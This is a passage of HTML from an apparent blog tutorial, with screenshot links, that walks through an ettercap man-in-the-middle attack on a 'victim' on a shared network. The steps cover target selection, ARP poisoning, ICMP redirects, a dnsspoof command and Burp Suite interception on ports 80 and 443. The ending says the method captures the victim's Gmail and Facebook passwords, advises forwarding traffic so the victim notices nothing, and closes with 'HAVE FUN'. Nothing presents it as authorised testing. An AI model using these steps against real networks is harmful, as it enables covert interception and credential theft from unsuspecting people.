<span class="Apple-tab-span" style="background-color: white; white-space: pre;"><span style="color: red;"><i> </i></span></span></div>
<div style="text-align: center;">
<span class="Apple-tab-span" style="background-color: white; white-space: pre;"><span style="color: red;"><i><br /></i></span></span></div>
<div style="text-align: center;">
<span class="Apple-tab-span" style="background-color: white; white-space: pre;"><span style="color: red;"><i><br /></i></span></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span>HOSTS --> SCAN FOR HOSTS</i></span></div>
<div style="text-align: center;">
<span class="Apple-tab-span" style="background-color: white; white-space: pre;"><span style="color: red;"><i> </i></span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="background-color: white; color: red; margin-left: 1em; margin-right: 1em;"><a href="http://4.bp.blogspot.com/-WntXtdQcvlM/T-ydvbdUunI/AAAAAAAAALg/ikqp7cFNyqE/s1600/5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><i><img border="0" height="358" src="http://4.bp.blogspot.com/-WntXtdQcvlM/T-ydvbdUunI/AAAAAAAAALg/ikqp7cFNyqE/s640/5.png" width="640" /></i></a></span></div>
<div style="text-align: center;">
<span class="Apple-tab-span" style="background-color: white; white-space: pre;"><span style="color: red;"><i> </i></span></span></div>
<div style="text-align: center;">
<span class="Apple-tab-span" style="background-color: white; white-space: pre;"><span style="color: red;"><i><br /></i></span></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><br /></i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i>HOSTS --> HOSTS LIST </i></span></div>
<div style="text-align: center;">
<span class="Apple-tab-span" style="background-color: white; white-space: pre;"><span style="color: red;"><i> </i></span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="background-color: white; color: red; margin-left: 1em; margin-right: 1em;"><i style="margin-left: 1em; margin-right: 1em;"><a href="http://4.bp.blogspot.com/-CMuA4RA_4uk/T-yefXLqJeI/AAAAAAAAALo/FktpdNxjM3k/s1600/6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="358" src="http://4.bp.blogspot.com/-CMuA4RA_4uk/T-yefXLqJeI/AAAAAAAAALo/FktpdNxjM3k/s640/6.png" width="640" /></a></i></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="background-color: white; color: red; margin-left: 1em; margin-right: 1em;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="background-color: white; color: red; margin-left: 1em; margin-right: 1em;"><br /></span></div>
<div style="text-align: center;">
<span class="Apple-tab-span" style="background-color: white; white-space: pre;"><span style="color: red;"><i> </i></span></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i> Select the Victim's IP and click "ADD TO TARGET 1" or "ADD TO TARGET 2"
</i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><br /></i></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="background-color: white; color: red; margin-left: 1em; margin-right: 1em;"><a href="http://1.bp.blogspot.com/-8wmR7aMZ5qQ/T-yfRZjprTI/AAAAAAAAALw/ntM-vVGnBrE/s1600/7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><i><img border="0" height="358" src="http://1.bp.blogspot.com/-8wmR7aMZ5qQ/T-yfRZjprTI/AAAAAAAAALw/ntM-vVGnBrE/s640/7.png" width="640" /></i></a></span></div>
<div class="separator" style="clear: both; text-align: center;">
<i><br /></i></div>
<div class="separator" style="clear: both; text-align: center;">
<i><br /></i></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i> </i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i>MITM --> ARP POISONING ---> (tick on it) SNIFF REMOTE CONNECTION --> OK</i></span></div>
<div style="text-align: center;">
<span class="Apple-tab-span" style="background-color: white; white-space: pre;"><span style="color: red;"><i> </i></span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="background-color: white; color: red; margin-left: 1em; margin-right: 1em;"><i style="margin-left: 1em; margin-right: 1em;"><a href="http://4.bp.blogspot.com/-blDpgKaYbOM/T-yf-se01BI/AAAAAAAAAL4/xsRCqGXSetk/s1600/8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="358" src="http://4.bp.blogspot.com/-blDpgKaYbOM/T-yf-se01BI/AAAAAAAAAL4/xsRCqGXSetk/s640/8.png" width="640" /></a></i></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="background-color: white; color: red; margin-left: 1em; margin-right: 1em;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="background-color: white; color: red; margin-left: 1em; margin-right: 1em;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="background-color: white; color: red; margin-left: 1em; margin-right: 1em;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="background-color: white; color: red; margin-left: 1em; margin-right: 1em;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="background-color: white; color: red; margin-left: 1em; margin-right: 1em;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="background-color: white; color: red; margin-left: 1em; margin-right: 1em;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="background-color: white; color: red; margin-left: 1em; margin-right: 1em;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="background-color: white; color: red; margin-left: 1em; margin-right: 1em;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="background-color: white; color: red; margin-left: 1em; margin-right: 1em;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="background-color: white; color: red; margin-left: 1em; margin-right: 1em;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="background-color: white; color: red; margin-left: 1em; margin-right: 1em;"><i style="margin-left: 1em; margin-right: 1em;"><a href="http://3.bp.blogspot.com/-dMR9mFM4seU/T-ygzjGcyYI/AAAAAAAAAMA/vpGzJlU075c/s1600/9.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="358" src="http://3.bp.blogspot.com/-dMR9mFM4seU/T-ygzjGcyYI/AAAAAAAAAMA/vpGzJlU075c/s640/9.png" width="640" /></a></i></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="background-color: white; color: red; margin-left: 1em; margin-right: 1em;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="background-color: white; color: red; margin-left: 1em; margin-right: 1em;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="background-color: white; color: red; margin-left: 1em; margin-right: 1em;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<i><br /></i></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span>MITM --> ICMP REDIRECTS --> (enter your MAC ADDRESS and IP ADDRESS) GATEWAY INFORMATON --> OK</i></span></div>
<div style="text-align: center;">
<span class="Apple-tab-span" style="background-color: white; white-space: pre;"><span style="color: red;"><i> </i></span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="background-color: white; color: red; margin-left: 1em; margin-right: 1em;"><a href="http://2.bp.blogspot.com/-D5wZGYJLQV4/T-yVfRRWmPI/AAAAAAAAAKA/XVHjctXUHac/s1600/10.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><i><img border="0" height="358" src="http://2.bp.blogspot.com/-D5wZGYJLQV4/T-yVfRRWmPI/AAAAAAAAAKA/XVHjctXUHac/s640/10.png" width="640" /></i></a></span></div>
<div class="separator" style="clear: both; text-align: center;">
<i><br /></i></div>
<div class="separator" style="clear: both; text-align: center;">
<i><br /></i></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="background-color: white; color: red; margin-left: 1em; margin-right: 1em;"><i style="margin-left: 1em; margin-right: 1em;"><a href="http://1.bp.blogspot.com/-5Yj-IWYZ4xY/T-yWNeVSkKI/AAAAAAAAAKI/jIFfA9RIvdk/s1600/11.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="358" src="http://1.bp.blogspot.com/-5Yj-IWYZ4xY/T-yWNeVSkKI/AAAAAAAAAKI/jIFfA9RIvdk/s640/11.png" width="640" /></a></i></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="background-color: white; color: red; margin-left: 1em; margin-right: 1em;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="background-color: white; color: red; margin-left: 1em; margin-right: 1em;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<i><br /></i></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span>START --> START SNIFFING</i></span></div>
<div style="text-align: center;">
<span class="Apple-tab-span" style="background-color: white; white-space: pre;"><span style="color: red;"><i> </i></span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="background-color: white; color: red; margin-left: 1em; margin-right: 1em;"><i style="margin-left: 1em; margin-right: 1em;"><a href="http://4.bp.blogspot.com/-aMl8gorEoxU/T-yXCElQsLI/AAAAAAAAAKQ/SZ9_bORdphE/s1600/12.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="358" src="http://4.bp.blogspot.com/-aMl8gorEoxU/T-yXCElQsLI/AAAAAAAAAKQ/SZ9_bORdphE/s640/12.png" width="640" /></a></i></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="background-color: white; color: red; margin-left: 1em; margin-right: 1em;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="background-color: white; color: red; margin-left: 1em; margin-right: 1em;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="background-color: white; color: red; margin-left: 1em; margin-right: 1em;"><br /></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span>To check if the ARP poisoning is successful, </i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><br /></i></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="background-color: white; color: red; margin-left: 1em; margin-right: 1em;"><i style="margin-left: 1em; margin-right: 1em;"><a href="http://1.bp.blogspot.com/-iMEzbedOfBk/T-yX8qfwhjI/AAAAAAAAAKY/GNl9gM-vceQ/s1600/13.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="358" src="http://1.bp.blogspot.com/-iMEzbedOfBk/T-yX8qfwhjI/AAAAAAAAAKY/GNl9gM-vceQ/s640/13.png" width="640" /></a></i></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="background-color: white; color: red;"><i><br /></i></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="background-color: white; color: red;"><i><br /></i></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="background-color: white; color: red;"><i><br /></i></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="background-color: white; color: red;"><i><span class="Apple-tab-span" style="white-space: pre;"></span>PLUGINS --> CHK_POISON</i></span></div>
<div style="text-align: center;">
<span class="Apple-tab-span" style="background-color: white; white-space: pre;"><span style="color: red;"><i> </i></span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="background-color: white; color: red; margin-left: 1em; margin-right: 1em;"><a href="http://2.bp.blogspot.com/-_LL3n3XKxTk/T-yY0gUyvAI/AAAAAAAAAKg/miH9wrT2wq4/s1600/14.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><i><img border="0" height="358" src="http://2.bp.blogspot.com/-_LL3n3XKxTk/T-yY0gUyvAI/AAAAAAAAAKg/miH9wrT2wq4/s640/14.png" width="640" /></i></a></span></div>
<div class="separator" style="clear: both; text-align: center;">
<i><br /></i></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span>If poison successful then move on</i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span>else try disconnecting and reconnectiong again or restart ettercap again.</i></span></div>
<div style="text-align: center;">
<span class="Apple-tab-span" style="background-color: white; white-space: pre;"><span style="color: red;"><i> </i></span></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: blue; font-size: x-large;"><b><i><br /></i></b></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: blue; font-size: x-large;"><b><i>STEP 3 (OPTIONAL)</i></b></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: blue; font-size: x-large;"><b><i><br /></i></b></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span>If you guys want to spoof the dns side by side then type:</i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><br /></i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><br /></i></span></div>
<div style="text-align: center;">
</div>
<div style="text-align: center;">
<span style="background-color: white;"><i><span class="Apple-tab-span" style="color: red; white-space: pre;"> </span><span style="color: red;"> </span><span style="color: purple; font-size: large;"><b>dnsspoof -i wlan0 > /root/Desktop/dns.txt </b></span></i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><br /></i></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="background-color: white; color: red; margin-left: 1em; margin-right: 1em;"><i style="margin-left: 1em; margin-right: 1em;"><a href="http://4.bp.blogspot.com/-kMzNKWLr63o/T-yZLgLZcQI/AAAAAAAAAKo/we-1881JtMI/s1600/15.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="358" src="http://4.bp.blogspot.com/-kMzNKWLr63o/T-yZLgLZcQI/AAAAAAAAAKo/we-1881JtMI/s640/15.png" width="640" /></a></i></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="background-color: white; color: red; margin-left: 1em; margin-right: 1em;"><br /></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span>(the spoofed dns data will be save to dns.txt located here --> "/root/Desktop/"</i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><br /></i></span></div>
<div style="text-align: center;">
<span class="Apple-tab-span" style="background-color: white; white-space: pre;"><span style="color: red;"><i> </i></span></span></div>
<div style="text-align: center;">
<span class="Apple-tab-span" style="background-color: white; white-space: pre;"><span style="color: red;"><i><br /></i></span></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: blue; font-size: x-large;"><b><i>FINAL STEP</i></b></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><br /></i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><br /></i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i>Start Burpsuite</i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><br /></i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span>BACKTRACK --> VULNERABILITY ASSESSMENT --> WEB APPLICATION ASSESSMENT --> WEB APPLICATION PROXIES --> BURPSUITE</i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><br /></i></span></div>
<div class="separator" style="clear: both; text-align: center;">
<i style="margin-left: 1em; margin-right: 1em;"><a href="http://3.bp.blogspot.com/-hd83hSllW5A/T-yZ5PvKcEI/AAAAAAAAAKw/c2ljHzwyZZs/s1600/16.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="358" src="http://3.bp.blogspot.com/-hd83hSllW5A/T-yZ5PvKcEI/AAAAAAAAAKw/c2ljHzwyZZs/s640/16.png" width="640" /></a></i></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i>goto PROXY --> OPTIONS</i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i>now add port number 80 (http) and 443 (https)</i></span></div>
<div style="text-align: center;">
<span style="color: red;"><i><br /></i></span></div>
<div class="separator" style="clear: both; text-align: center;">
<i style="margin-left: 1em; margin-right: 1em;"><a href="http://2.bp.blogspot.com/-QbATQCi7Tj8/T-yaSu2xdtI/AAAAAAAAAK4/cSDSm9jq_bE/s1600/17.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="358" src="http://2.bp.blogspot.com/-QbATQCi7Tj8/T-yaSu2xdtI/AAAAAAAAAK4/cSDSm9jq_bE/s640/17.png" width="640" /></a></i></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i>goto proxy --> INTERCEPT (click ON) :-)</i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><br /></i></span></div>
<div class="separator" style="clear: both; text-align: center;">
<i style="margin-left: 1em; margin-right: 1em;"><a href="http://3.bp.blogspot.com/-XOs75_A1vvQ/T-yasut4_fI/AAAAAAAAALA/2-mV1C9YMds/s1600/18.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="358" src="http://3.bp.blogspot.com/-XOs75_A1vvQ/T-yasut4_fI/AAAAAAAAALA/2-mV1C9YMds/s640/18.png" width="640" /></a></i></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i>NOW IF THE VICTIM SURF THE INTERNET, ALL THE QUERIES WILL BE FORWARDED</i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i>THROUGH YOU :-)</i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><br /></i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i>NOTE: after Intercepting the data and sniffing the password of gmail,facebook, etc.. ALWAYS REMEMBER TO CLICK ON "FORWARD" otherwise the victim </i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i>will not be able to surf i.e his/her browser will be loading only... :D</i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i><br /></i></span></div>
<div style="text-align: center;">
<span style="background-color: white; color: red;"><i>HAVE FUN !!</i></span></div>
<div style="text-align: center;">
<br /></div>
Abyss Zircanavohttp://www.blogger.com/profile/17618036098642560367noreply@blogger.com0